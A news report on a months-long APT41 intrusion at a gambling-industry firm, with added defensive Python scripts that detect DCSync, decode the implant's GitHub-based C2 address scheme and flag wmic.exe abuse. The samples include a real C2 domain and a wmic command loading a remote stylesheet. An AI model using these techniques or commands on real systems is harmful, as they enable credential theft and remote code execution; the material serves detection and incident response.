A prolific Chinese nation-state actor known as APT41 (aka Brass Typhoon, Earth Baku, Wicked Panda or Winnti) has been attributed to a sophisticated cyber attack targeting the gambling industry.
“For at least six months, the attackers secretly collected valuable information from the target company, including but not limited to network configurations, user passwords and LSASS process secrets,” Ido Naor, co-founder and CEO of Israeli cybersecurity company Security Joes, said in a statement shared with The Hacker News.
“During the intrusion, the attackers continuously updated their toolset based on the security team’s response. As defenders watched, they changed their strategies and tools to evade detection and maintain constant access to the compromised network.”
The multi-stage attack, which targeted one of the company’s clients and lasted nearly nine months this year, overlaps with a set of intrusions tracked by cybersecurity vendor Sophos under the name Operation Crimson Palace.
Naor said the company responded to the incident four months ago, adding that “these attacks depend on government-sponsored decision-makers. This time, we suspect with high confidence that APT41 was after financial gain.”
The campaign was designed with stealth in mind, using a variety of tactics to achieve its goals with a custom toolkit that not only bypasses the security software installed in the environment, but also collects sensitive information and establishes covert channels for persistent remote access.
Security Joes described APT41 as “highly skilled and methodical,” citing its ability to carry out espionage attacks as well as supply chain poisoning, leading to intellectual property theft and financially motivated intrusions such as ransomware and cryptocurrency mining.
The exact initial access vector used in the attack is currently unknown, but the evidence points to phishing emails, given the absence of actively exploited vulnerabilities in web-facing applications or signs of a supply chain breach.
“Once inside the target infrastructure, the attackers launched a DCSync attack to collect password hashes of service and administrator accounts to expand their access,” the company said in a report. “With these credentials, they established persistence and maintained control over the network, focusing specifically on administrator and developer accounts.”
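A DCSync request is only distinguishable from legitimate replication by who asks for it: domain controllers and known directory-sync services exercise replication rights all day, anything else is a credential-theft signal. The script below is an added example (not Security Joes’ tooling) that runs that check over constructed, simplified Windows Security Event ID 4662 lines in key=value form; the replication-right GUIDs are the documented Active Directory extended rights, the log lines, account names and the all-zero placeholder GUID are made up for the demo.

```python
import re
from typing import Dict, Iterable, List, Set, Tuple

# Documented Active Directory extended-right GUIDs that a DCSync request needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample events. Real 4662 events are EVTX/XML; the field names
# used here (SubjectUserName, Properties, AccessMask, ...) are the real ones.
SAMPLE_EVENTS = [
    # a domain controller replicating: expected
    "EventID=4662 SubjectDomainName=CORP SubjectUserName=DC02$ ObjectType=domainDNS "
    "AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # a service account pulling replication data: DCSync-like
    "EventID=4662 SubjectDomainName=CORP SubjectUserName=svc-backup ObjectType=domainDNS "
    "AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # an unrelated 4662 (placeholder GUID, not a replication right)
    "EventID=4662 SubjectDomainName=CORP SubjectUserName=jdoe ObjectType=user "
    "AccessMask=0x20 Properties={00000000-0000-0000-0000-000000000000}",
    # not a 4662 at all
    "EventID=4624 SubjectDomainName=CORP SubjectUserName=jdoe LogonType=3",
]

# key=value pairs; the Properties value may be several {GUID}s separated by spaces
KV_RE = re.compile(r"(\w+)=(\{[^}]*\}(?:\s+\{[^}]*\})*|\S+)")
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value log line into a dict."""
    return {k: v for k, v in KV_RE.findall(line)}


def replication_rights_used(event: Dict[str, str]) -> List[str]:
    """Names of the replication rights referenced in the event's Properties field."""
    guids = GUID_RE.findall(event.get("Properties", ""))
    return [REPLICATION_RIGHTS[g.lower()] for g in guids if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(lines: Iterable[str],
                  expected_replicators: Set[str]) -> List[Tuple[str, List[str]]]:
    """Return (DOMAIN\\account, [rights]) for every 4662 event in which an account
    outside the allow-list (DC machine accounts, known sync services) exercised
    directory replication rights."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        rights = replication_rights_used(ev)
        if not rights or ev.get("SubjectUserName", "") in expected_replicators:
            continue
        account = f"{ev.get('SubjectDomainName', '?')}\\{ev.get('SubjectUserName', '?')}"
        hits.append((account, rights))
    return hits


if __name__ == "__main__":
    for account, rights in detect_dcsync(SAMPLE_EVENTS, {"DC01$", "DC02$"}):
        print(f"possible DCSync: {account} used {', '.join(rights)}")
```

The allow-list is the part that needs care in a real deployment: every domain controller’s machine account and any legitimate sync identity (for example an Entra ID Connect service account) belongs in it, and anything that later shows up in the output is worth an immediate look, since the same hashes it returns are what the report describes being used for persistence.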
The attackers are said to have methodically conducted reconnaissance and post-exploitation activities, often customizing their toolset in response to steps taken to counter the threat, and escalating their privileges with the ultimate goal of downloading and executing additional payloads.
Some of the techniques used to achieve these goals include Phantom DLL Hijacking and use of the legitimate wmic.exe utility, as well as abuse of access to service accounts with administrative rights to carry out execution.
The next stage is a malicious DLL file called TSVIPSrv.dll that is retrieved over the SMB protocol, after which the payload establishes contact with a hard-coded command-and-control (C2) server.
“When the hard-coded C2 fails, the implant attempts to update its C2 information by scanning GitHub users using the following URL: github(.)com/search?o=desc&q=pointers&s=joined&type=Users&.”
“The malware parses HTML received from a GitHub request, looking for sequences of capitalized words separated only by spaces. It collects eight of those words, then extracts only the capital letters between A and P. This process creates an 8-character string that encodes the IP address of the new C2 server that will be used in the attack.”
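For an incident responder, the useful part of that description is the reverse direction: given a saved copy of the GitHub search page or an 8-letter string carved from memory, what address would the implant have resolved? The script below is an added example, not code from the report, and it rests on one assumption the page does not spell out, namely that each letter A..P stands for a hex nibble 0..15, so eight letters encode the four octets of an IPv4 address (sixteen letters and eight characters are exactly what that needs). The capitalized-word scan follows the page’s description as read here (initial-capital words separated by single spaces, capital letters kept only if they fall in A..P); the HTML snippet is constructed.

```python
import re
from typing import List, Optional

# Assumption: letter index in this alphabet == hex nibble value (A=0 ... P=15).
ALPHABET = "ABCDEFGHIJKLMNOP"

# Constructed stand-in for the scraped search page: one run of eight capitalized
# words followed by lowercase text, which ends the run.
SAMPLE_HTML = "<p>Alpha Kilo Bravo Echo Bravo Golf Alpha Bravo users joined recently</p>"

# A run of at least eight capitalized words separated by single spaces.
CAP_RUN_RE = re.compile(r"\b[A-Z][A-Za-z]*(?: [A-Z][A-Za-z]*){7,}\b")


def decode_c2_letters(token: str) -> Optional[str]:
    """Decode an 8-letter A..P token into dotted-quad IPv4 text.
    Returns None when the token cannot be a candidate (wrong length or letters
    outside A..P), so callers can filter carved strings cheaply."""
    if len(token) != 8 or any(c not in ALPHABET for c in token):
        return None
    nibbles = [ALPHABET.index(c) for c in token]
    # two nibbles per octet, high nibble first
    octets = [(nibbles[i] << 4) | nibbles[i + 1] for i in range(0, 8, 2)]
    return ".".join(str(o) for o in octets)


def candidate_ips_from_page(html: str) -> List[str]:
    """Apply the page-described scan to captured HTML and return every address
    the implant could have derived from it (normally one)."""
    ips = []
    for run in CAP_RUN_RE.finditer(html):
        words = run.group(0).split(" ")[:8]          # "collects eight of those words"
        letters = [c for w in words for c in w if c in ALPHABET]  # only capitals A..P
        ip = decode_c2_letters("".join(letters[:8]))
        if ip:
            ips.append(ip)
    return ips


if __name__ == "__main__":
    print(decode_c2_letters("AKBEBGAB"))        # 10.20.22.1
    print(candidate_ips_from_page(SAMPLE_HTML))  # ['10.20.22.1']
```

Because the scheme has no checksum, any eight A..P letters decode to *some* address, which is why the scan should be run against the actual page captured at the time of the intrusion (proxy cache, packet capture) rather than against a fresh fetch, and why the decoded address is only an indicator once it also shows up in outbound connection logs.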
The initial contact with the C2 server paves the way for the infected system to be profiled and more malware to be launched over the socket connection.
Security Joes said the threat actors went quiet for several weeks after their activity was discovered, but eventually returned with an updated approach that involved executing highly obfuscated JavaScript code embedded in a modified version of an XSL file (“texttable.xsl”) using the LOLBIN wmic.exe.
“Once the WMIC.exe MEMORYCHIP GET command is run, it indirectly loads the texttable.xsl file to format the output, forcing the execution of malicious JavaScript code injected by the attacker,” the researchers explained.
The JavaScript, for its part, serves as a loader that uses the time.qnapntp(.)com domain as a C2 server to retrieve the next payload, which fingerprints the machine and sends the information back to the server, subject to filtering criteria that likely serve to target only those machines of interest to the threat actor.
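What makes this stage hard to catch on the command line is that `wmic memorychip get` contains no script and no `/format:` switch; the stylesheet is picked up implicitly from the wbem directory. Two behaviours still stand out: wmic.exe opening a network connection to an address outside the corporate ranges (the loader talking to its C2), and, for the louder variant, a `/format:` argument that points at a remote or out-of-tree stylesheet. The script below is an added example, not the researchers’ detection logic, that applies both rules to constructed Sysmon-style process-creation (Event 1) and network-connection (Event 3) lines. The hostname is the C2 domain named on this page; the IP 203.0.113.7 is an RFC 5737 documentation address standing in for a public one, and the internal ranges are plain RFC 1918 plus loopback and link-local.

```python
import ipaddress
import re
from typing import Dict, Iterable, List

# Constructed Sysmon-style events (field names match Sysmon's).
SAMPLE_EVENTS = [
    # benign-looking command line: no script, no /format switch
    r'EventID=1 Image=C:\Windows\System32\wbem\WMIC.exe ParentImage=C:\Windows\System32\cmd.exe '
    r'CommandLine="wmic memorychip get"',
    # ...followed by wmic.exe itself reaching out to the C2 host named in the report
    r'EventID=3 Image=C:\Windows\System32\wbem\WMIC.exe DestinationIp=203.0.113.7 '
    r'DestinationPort=443 DestinationHostname=time.qnapntp.com',
    # wmic talking to an internal host: normal remote-WMI administration, not flagged
    r'EventID=3 Image=C:\Windows\System32\wbem\WMIC.exe DestinationIp=10.20.22.15 '
    r'DestinationPort=135 DestinationHostname=fileserver.corp.local',
    # the explicit form: output rendered with a remote stylesheet
    r'EventID=1 Image=C:\Windows\System32\wbem\WMIC.exe ParentImage=C:\Windows\explorer.exe '
    r'CommandLine="wmic os get /format:https://203.0.113.7/x.xsl"',
    # same destination from a browser: a different process, out of scope for this rule
    r'EventID=3 Image=C:\Program Files\Mozilla Firefox\firefox.exe DestinationIp=203.0.113.7 '
    r'DestinationPort=443 DestinationHostname=time.qnapntp.com',
]

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')          # values may be quoted
FORMAT_RE = re.compile(r'/format:"?([^"\s]+)', re.IGNORECASE)

INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def parse_event(line: str) -> Dict[str, str]:
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def is_wmic(event: Dict[str, str]) -> bool:
    return event.get("Image", "").lower().endswith("\\wmic.exe")


def is_internal(ip_text: str) -> bool:
    """True for RFC 1918, loopback and link-local; unparsable text counts as internal
    so that a malformed field never raises a false alert on its own."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return True
    return any(ip in net for net in INTERNAL_NETS)


def suspicious_format_source(cmdline: str) -> str:
    """Return the /format: source if it is remote (URL or UNC) or an .xsl file
    outside the wbem directory, else an empty string."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return ""
    src = m.group(1)
    low = src.lower()
    if low.startswith(("http://", "https://", "\\\\")):
        return src
    if low.endswith(".xsl") and "\\wbem\\" not in low:
        return src
    return ""


def detect_wmic_abuse(lines: Iterable[str]) -> List[str]:
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if not is_wmic(ev):
            continue
        if ev.get("EventID") == "3" and not is_internal(ev.get("DestinationIp", "")):
            alerts.append(f"wmic.exe connected to external host "
                          f"{ev.get('DestinationHostname', '?')} "
                          f"({ev['DestinationIp']}:{ev.get('DestinationPort', '?')})")
        elif ev.get("EventID") == "1":
            src = suspicious_format_source(ev.get("CommandLine", ""))
            if src:
                alerts.append(f"wmic.exe rendering output with external stylesheet {src}")
    return alerts


if __name__ == "__main__":
    for alert in detect_wmic_abuse(SAMPLE_EVENTS):
        print(alert)
```

The network rule is the one that catches the case in this report, since the modified stylesheet sits at its normal path and the command line is clean; pairing it with file-integrity monitoring of the XSL files under the wbem directory closes the gap for loaders that never leave the host.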
“What really stands out about the code is the deliberate targeting of machines with IP addresses containing the substring ‘10.20.22,’” the researchers said.
“This highlights which specific devices are valuable to an attacker, namely devices on subnets 10.20.22(0-9).(0-255). By correlating this information with network logs and the IP addresses of the devices on which the file was detected, we concluded that the attacker used this filtering mechanism to ensure that only devices on the VPN subnet were affected.”